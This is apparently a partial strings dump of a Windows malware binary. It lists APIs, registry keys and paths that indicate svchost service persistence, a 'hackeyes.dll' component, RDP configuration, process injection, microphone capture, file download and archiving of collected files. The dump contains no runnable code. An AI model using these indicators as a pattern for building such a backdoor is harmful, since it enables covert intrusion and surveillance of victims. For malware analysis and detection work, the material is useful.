SHDeleteKeyA
shell32.dll
SHELL32.dll
ShellExecuteA
shell\explore=
shell\explore\Command=%s\%s %s
shell\open=
shell\open\Command=%s\%s %s
shell\open\Default=1
SHGetFileInfoA
SHGetSpecialFolderPathA
shlwapi.dll
SHLWAPI.dll
shsvcs.dll
ShutdownWithoutLogon
SizeofResource
%s M -ibck -r -o+ -ep1 "%s" "%s\*"
_snprintf
SOFTWARE\Mi
SOFTWARE\Microsoft\Windows\CurrentVersion\netcache
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
software\mICROSOFT\wINDOWS nt\cURRENTvERSION\sVCHOST
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SOFTWARE\Policies\Microsoft\Windows\Installer
\\%s\pipe
\\%s\pipe\browser
?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ
sprintf
=+=`=S>r>w>
%s%s*.*
=:=S=s=
%s\%s%d.exe
%s\%s.dll
SSDPSRV
ssdpsrv.dll
%s\SHELL\OPEN\COMMAND
%s\%s\%s
%s%s\%s
%s%s%s
StartServiceA
strchr
_strcmpi
stream end
stream error
strncat
strncmp
strncpy
_strnicmp
strrchr
strstr
\SUVWhP
SVWhDdk h$
SVWQRj
swsocknetman1ssdp
%s X -ibck "%s" "%s\"
System
\system32
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
SYSTEM\CurrentControlSet\Control\SafeBoot\Network
SYSTEM\CurrentControlSet\Control\Terminal Server
SYSTEM\CurrentControlSet\Control\Terminal Server\RDPTcp
SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp
SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
system\cURRENTcONTROLsET\sERVICES\
SYSTEM\CurrentControlSet\Services
system\cURRENTcONTROLsET\sERVICES\%s
SYSTEM\CurrentControlSet\Services\TermDD
SYSTEM\CurrentControlSet\Services\TermService
SYSTEM\Current%s\%s
SystemParametersInfoA
%SystemRoot%\system32\hackeyes.dll
%SystemRoot%\System32\svchost.exe -k netsvcs
System Volume Information
|$-[t.
T$0QRP
T+3x%A
Tapisrv
tapisrv.dll
T$DPVS
T$dQRP
TerminateProcess
TerminateThread
.textVT
T$ Fj:V
T$(Fj:V
Themes
_This #g
!This program cannot be run in DOS mode.
Thread32First
Thread32Next
?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z
tJ<\u8
|$<.tK
T$LPQR
T$LRWS
too many length or distance symbols
T$,PQhX@
T$(PQR
T$ QRj
tqSUVj2W
TransactNamedPipe
TranslateMessage
T$ RQPV
T$,RWV
TSEnabled
t-</t)F
tTisrv
t$ WSPVR
?%_#txg
tZ9H tU9H$tP
>"u:F@
UnhookWindowsHookEx
unknown compression method
UnmapViewOfFile
upnphost
upnphost.dll
#upnphostKn&s
URLDownloadToFileA
urlmon.dll
USER32.dll
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)
UuidFromStringA
UuidToStringA
\$ UVW
:@;v;{;
V3_3o3x3
V6sion\
VDPQRUSP
v|htcL
VirtualAlloc
VirtualAllocEx
VirtualFree
VirtualProtect
<;<V<i<u<
V@j QR
+*%*+vp*vCpuC
VVVVh0
VVVVVV
VVVVVVYUhbMC+Fnw==
?'?.?w?
|w9=trW
W(9W$u
WaitForMultipleObjects
WaitForSingleObject
waveInAddBuffer
waveInClose
waveInGetNumDevs
waveInOpen
waveInPrepareHeader
waveInReset
waveInStart
waveInStop
waveInUnprepareHeader
waveOutClose
waveOutGetNumDevs
waveOutOpen
waveOutPrepareHeader
waveOutReset
waveOutUnprepareHeader
waveOutWrite
wcscpy
wcstombs
WideCharToMultiByte
WindowFromPoint
WINDOWS
Windows Media Player
Windows NT
WindowsUpdate
WinExec
WININET.dll
Winlogon
WINMM.dll
WinRAR
winsta0
winsta0\default
WinSta0\Default
WINTRUST.dll
WinVerifyTrust
WithTag	
WmdmPmSN
WmdmPmSN'Fa
WNetAddConnection2A
WNetCloseEnum
WNetEnumResourceA
WNetOpenEnumA
WO$_9E
WriteFile
WriteProcessMemory
Ws2_32.dll
WS2_32.dll
WSAAddressToStringA
WSACreateEvent
WSAIoctl
WSARecvFrom
WSAResetEvent
WSASocketA
wsprintfA
WTSAPI32.dll
WTSFreeMemory
WTSQuerySessionInformationA
|$ WUSV
|$ WVU
WWRhP[
www.490a-B8B5-9B8C1E870B0C.com
www.baidu.com
WWWWWW
WWWWWWnw==
<	=x=}=
_XcptFilter
<)<.<X<i<o
<)<.<X<i<o<
xmlpbS
xmlprov
xmlprov.dll
{+xN{tEODBE
XPTPSW
XPVSSG
?_Xran@std@@YAXXZ
XRichS
xwuLEwE
/;%y;~;
.y!GN&
*y/.uzyzuEFzG
@z}]u2o
ZwClose
ZwCreateKey
ZwOpenKey
ZwQueryInformationThread
ZwSetValueKey